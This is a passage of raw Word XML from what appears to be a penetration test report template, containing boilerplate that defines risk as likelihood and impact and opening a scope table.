                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>provided</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">regarding items noticed during testing, strong controls, and additional </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>documentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37782282" w14:textId="77777777" w:rsidR="00142A90" w:rsidRDefault="00142A90" w:rsidP="00142A90">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D0B55D" w14:textId="77777777" w:rsidR="00142A90" w:rsidRDefault="00142A90" w:rsidP="00142A90">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="Risk_Factors"/>
      <w:bookmarkStart w:id="6" w:name="_bookmark8"/>
      <w:bookmarkStart w:id="7" w:name="_Toc141061096"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t>Risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Factors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="5FCA65FC" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="007859A3" w:rsidRDefault="00142A90" w:rsidP="00142A90">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
        <w:ind w:left="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Risk</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>measured</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>factors:</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Likelihood</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B74D09" w14:textId="77777777" w:rsidR="00142A90" w:rsidRDefault="00142A90" w:rsidP="00142A90">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D133FF6" w14:textId="77777777" w:rsidR="00142A90" w:rsidRDefault="00142A90" w:rsidP="00142A90">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="Likelihood"/>
      <w:bookmarkStart w:id="9" w:name="_bookmark9"/>
      <w:bookmarkStart w:id="10" w:name="_Toc141061097"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Likelihood</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="6689BD92" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="007859A3" w:rsidRDefault="00142A90" w:rsidP="00142A90">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="136"/>
        <w:ind w:left="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Likelihood</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>measures</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>potential</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>being</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exploited.</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ratings</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>given</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>the difficulty of the attack, the available tools, attacker skill level, and client environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3A77F5" w14:textId="77777777" w:rsidR="00142A90" w:rsidRDefault="00142A90" w:rsidP="00142A90">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="34"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5718DDC0" w14:textId="77777777" w:rsidR="00142A90" w:rsidRDefault="00142A90" w:rsidP="00142A90">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="Impact"/>
      <w:bookmarkStart w:id="12" w:name="_bookmark10"/>
      <w:bookmarkStart w:id="13" w:name="_Toc141061098"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="6FFFF03B" w14:textId="1588BA70" w:rsidR="00142A90" w:rsidRPr="007859A3" w:rsidRDefault="00142A90" w:rsidP="00142A90">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="136"/>
        <w:ind w:left="239"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>measures</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>potential</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vulnerability’s</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>effect</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>operations,</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>including</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>confidentiality,</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>integrity, and availabilit</w:t>
      </w:r>
      <w:r w:rsidR="0092058B" w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of client systems and/or data, reputational harm, and financial loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49841FE4" w14:textId="2BE7E134" w:rsidR="3EFF00EC" w:rsidRDefault="3EFF00EC" w:rsidP="3EFF00EC"/>
    <w:p w14:paraId="43189308" w14:textId="41A68277" w:rsidR="00D33794" w:rsidRDefault="00D33794" w:rsidP="00332229">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc141061099"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="20CD66A3" w14:textId="77777777" w:rsidR="00D33794" w:rsidRDefault="00D33794" w:rsidP="00D33794">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic"/>
          <w:b/>
          <w:sz w:val="22"/>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7"/>
        <w:gridCol w:w="5802"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D33794" w14:paraId="15DFE2DA" w14:textId="77777777" w:rsidTr="00AA292C">
        <w:trPr>
          <w:trHeight w:val="405"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3767" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="99B8EB"/>
          </w:tcPr>
          <w:p w14:paraId="02E72EB2" w14:textId="77777777" w:rsidR="00D33794" w:rsidRPr="00FA1072" w:rsidRDefault="00D33794" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="67"/>
              <w:ind w:left="1255" w:right="1245"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5802" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="99B8EB"/>
          </w:tcPr>
          <w:p w14:paraId="79F70DF8" w14:textId="77777777" w:rsidR="00D33794" w:rsidRPr="00FA1072" w:rsidRDefault="00D33794" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="67"/>
              <w:ind w:left="2533" w:right="2524"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
